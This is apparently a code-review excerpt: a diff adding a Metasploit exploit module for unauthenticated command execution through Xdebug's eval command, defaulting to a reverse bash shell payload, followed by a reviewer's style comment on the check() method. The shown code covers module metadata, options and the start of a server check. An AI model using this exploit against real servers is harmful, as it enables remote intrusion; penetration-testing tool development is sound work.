modules/exploits/unix/http/xdebug_unauth_exec.rb

```diff
@@ -0,0 +1,113 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Remote
+  Rank = ExcellentRanking
+
+  include Msf::Exploit::Remote::Tcp
+  include Msf::Exploit::Remote::HttpClient
+  include Rex::Proto::Http
+
+  def initialize(info = {})
+    super(update_info(info,
+      'Name' => 'xdebug Unauthenticated OS Command Execution',
+      'Description' => %q{
+       Module exploits a vulnerability in the eval command present in Xdebug versions 2.5.5 and below.
+       This allows the attacker to execute arbitrary php code as the context of the web user.
+      },
+      'DisclosureDate' => 'Sep 17 2017',
+      'Author' => [
+        'Ricter Zheng', #Discovery https://twitter.com/RicterZ
+        'Shaksham Jaiswal', # MinatoTW
+        'Mumbai' # Austin Hudson
+      ],
+      'References' => [
+        ['URL', 'https://redshark1802.com/blog/2015/11/13/xpwn-exploiting-xdebug-enabled-servers/'],
+        ['URL', 'https://paper.seebug.org/397/']
+      ],
+      'License' => MSF_LICENSE,
+      'Platform' => 'unix',
+      'Arch' => [ARCH_CMD],
+      'DefaultTarget' => 0,
+      'Stance' => Msf::Exploit::Stance::Aggressive,
+      'DefaultOptions' => {
+        'PAYLOAD' => 'cmd/unix/reverse_bash'
+      },
+      'Payload' => {
+        'DisableNops' => true,
+      },
+      'Targets' => [[ 'Automatic', {} ]],
+    ))
+
+    register_options([
+        OptString.new('PATH', [ true, "Path to target webapp", "/index.php"]),
+        OptAddress.new('SRVHOST', [ true, "Callback host for accepting connections", "0.0.0.0"]),
+        OptInt.new('SRVPORT', [true, "Port to listen for the debugger", 9000]),
+        OptAddress.new('RHOST', [true, "Target address"]),
+        OptInt.new('RPORT', [true, "Target port", 80])
+    ])
+  end
+
+  def check
+    begin
+      res = send_request_cgi({
+        'uri' => datastore["PATH"],
+        'method' => 'GET',
+        'vars_get' => {
+          'XDEBUG_SESSION_START' => rand_text_alphanumeric(10)
+        }
+      })
+      vprint_status "Request sent\n#{res.headers}"
+      if res && res.headers.to_s =~ /XDEBUG/i
+        print_good("Looks like remote server has xdebug enabled\n")
```

Comment:
`vprint_*` methods are preferred over `print_*` methods inside a `check` method.

See: [How to write a check() method](https://github.com/rapid7/metasploit-framework/wiki/How-to-write-a-check()-method)